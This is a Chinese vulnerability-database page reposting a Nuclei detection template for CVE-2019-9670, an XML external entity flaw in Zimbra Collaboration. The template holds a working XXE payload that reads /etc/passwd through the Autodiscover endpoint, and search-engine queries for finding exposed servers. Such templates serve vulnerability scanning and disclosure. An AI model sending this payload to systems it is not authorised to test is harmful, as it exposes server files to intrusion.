CVE-2019-9670: Synacor Zimbra Collaboration <8.7.11p10 - XML External Entity Injection

日期: 2025-08-01 | 影响软件: Synacor Zimbra Collaboration | POC: 已公开

漏洞描述

Synacor Zimbra Collaboration Suite 8.7.x before 8.7.11p10 has an XML external entity injection (XXE) vulnerability via the mailboxd component.

PoC代码[已公开]

id: CVE-2019-9670

info:
  name: Synacor Zimbra Collaboration <8.7.11p10 - XML External Entity Injection
  author: ree4pwn
  severity: critical
  description: Synacor Zimbra Collaboration Suite 8.7.x before 8.7.11p10 has an XML external entity injection (XXE) vulnerability via the mailboxd component.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to read arbitrary files on the server, leading to unauthorized access to sensitive information.
  remediation: |
    Upgrade to the latest version of Synacor Zimbra Collaboration (8.7.11p10 or higher) to mitigate this vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/46693/
    - https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories
    - https://bugzilla.zimbra.com/show_bug.cgi?id=109129
    - http://www.rapid7.com/db/modules/exploit/linux/http/zimbra_xxe_rce
    - http://packetstormsecurity.com/files/152487/Zimbra-Collaboration-Autodiscover-Servlet-XXE-ProxyServlet-SSRF.html
    - https://isc.sans.edu/forums/diary/CVE20199670+Zimbra+Collaboration+Suite+XXE+vulnerability/27570/
    - https://nvd.nist.gov/vuln/detail/CVE-2019-9670
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2019-9670
    cwe-id: CWE-611
    epss-score: 0.9443
    epss-percentile: 0.99983
    cpe: cpe:2.3:a:synacor:zimbra_collaboration_suite:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: synacor
    product: zimbra_collaboration_suite
    shodan-query:
      - http.title:"zimbra collaboration suite"
      - http.title:"zimbra web client sign in"
    fofa-query:
      - title="zimbra web client sign in"
      - title="zimbra collaboration suite"
    google-query:
      - intitle:"zimbra collaboration suite"
      - intitle:"zimbra web client sign in"
  tags: cve,cve2019,zimbra,xxe,kev,edb,packetstorm,synacor

http:
  - raw:
      - |
        POST /Autodiscover/Autodiscover.xml HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/xml

        <!DOCTYPE xxe [
        <!ELEMENT name ANY >
        <!ENTITY xxe SYSTEM "file:///etc/passwd">]>
        <Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a">
        <Request>
        <EMailAddress>aaaaa</EMailAddress>
        <AcceptableResponseSchema>&xxe;</AcceptableResponseSchema>
        </Request>
        </Autodiscover>

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - 'root:.*:0:0:'
          - "Problem accessing"
        condition: and

      - type: status
        status:
          - 503
# digest: 4b0a00483046022100ad98fcefdeb91989450a918fbc5146ba4f042086e65573758649d2a13872b564022100af58f283e8d52dd4dd74223fde4bd7df26fac9e5ac6064374ca2e0ddf3ca5737:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2019/CVE-2019-9670.yaml

相关漏洞推荐